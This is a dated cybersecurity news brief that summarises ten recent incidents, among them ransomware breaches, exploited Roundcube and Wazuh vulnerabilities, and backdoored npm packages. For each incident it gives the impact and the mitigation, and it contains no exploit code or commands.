Svoboda Cybersecurity Brief June 10, 2025
Jun 10, 2025bulletproof VPN - stay anonymous
Ransomware Attack on AMI Group by APT73
AMI Group, a multinational conglomerate, confirmed a ransomware attack by APT73, targeting its upcoming digital platforms (scheduled for July 2025). The FBI alerted the company, but no ransom was paid, and existing systems remain unaffected. Impact: Isolated to pre-launch systems, but highlights APT73’s focus on high-value targets. Mitigation: FBI collaboration, internal IT audits, and enhanced cyber defenses.
Source: DataBreaches
Over 84,000 Roundcube Instances Vulnerable to RCE Flaw (CVE-2025-49113)
A critical remote code execution (RCE) flaw in Roundcube (versions 1.1.0–1.6.10) is actively exploited via unsanitized $_GET['_from'] input. Attackers sell exploits on underground forums, targeting shared hosting and government sectors. Impact: Data theft, session hijacking. Mitigation: Update to Roundcube 1.6.11/1.5.10, disable file uploads, enforce CSRF protections.
Source: BleepingComputer
Sensata Technologies Confirms Data Breach After Ransomware Attack
Sensata Technologies disclosed a March 2025 ransomware attack exfiltrating SSNs, passports, financial data, and medical records of employees. The breach lasted 9 days before detection. Impact: High-risk data exposure for current/former staff. Mitigation: Credit monitoring offered, investigation ongoing.
Source: BleepingComputer
Chinese Hackers Target SentinelOne in Supply Chain Attack Attempt
Chinese-linked APT15/UNC5174 and APT41 targeted SentinelOne and 70+ organizations via ShadowPad malware and compromised IT logistics vendors. Attacks leveraged Ivanti/Check Point exploits. Impact: Reconnaissance for future attacks, supply chain risks. Mitigation: No compromise detected; enhanced monitoring.
Source: The Hacker News
Mirai Botnets Exploit Wazuh Server Vulnerability (CVE-2025-24016)
Two Mirai botnets (LZRD and Resbot) exploit a 9.9 CVSS flaw in Wazuh servers (versions ≥4.4.0) via JSON deserialization. Attacks target Hadoop, TP-Link, and ZTE devices. Impact: DDoS, device compromise. Mitigation: Patch to Wazuh 4.9.1, restrict API access.
Source: The Hacker News
UNFI Wholesale Giant Hit by Cyberattack, Systems Taken Offline
United Natural Foods (UNFI) shut down systems after a June 5 cyberattack disrupted order fulfillment. Impact: Operational delays, potential supply chain ripple effects. Mitigation: Workarounds implemented, law enforcement notified.
Source: BleepingComputer
Google Fixes Bug Leaking Phone Numbers via Account Recovery
A flaw allowed brute-forcing Google account recovery phone numbers using IPv6 rotation and BotGuard token bypass. Fixed after researcher BruteCat reported it. Impact: Phishing/SIM-swapping risks. Mitigation: Deprecated vulnerable endpoint.
Source: BleepingComputer
React Native Aria Packages Backdoored in Supply Chain Attack
17 React Native Aria packages were modified to include a Python3127 PATH Hijack backdoor. Attackers used compromised NPM tokens. Impact: Low execution risk (frontend-only lib). Mitigation: Revoked tokens, enabled 2FA.
Source: SecurityWeek
Nigerian Cybercriminal Sentenced for Tax Prep Firm Hacks
Kingsley Utulu received 63 months for stealing data from US tax firms, filing fraudulent claims, and laundering $2.5M. Impact: Financial fraud, identity theft.
Source: SecurityWeek
Malicious NPM Packages Wipe Systems via Express Backdoors
express-api-sync and system-health-sync-api packages contained hidden endpoints to delete app directories when triggered. Impact: Data destruction, server compromise. Mitigation: Audit dependencies, monitor endpoints.
Source: SecurityWeek
Share this brief: https://svo.bz/FU05
If you want to support us, you can donate here: Donate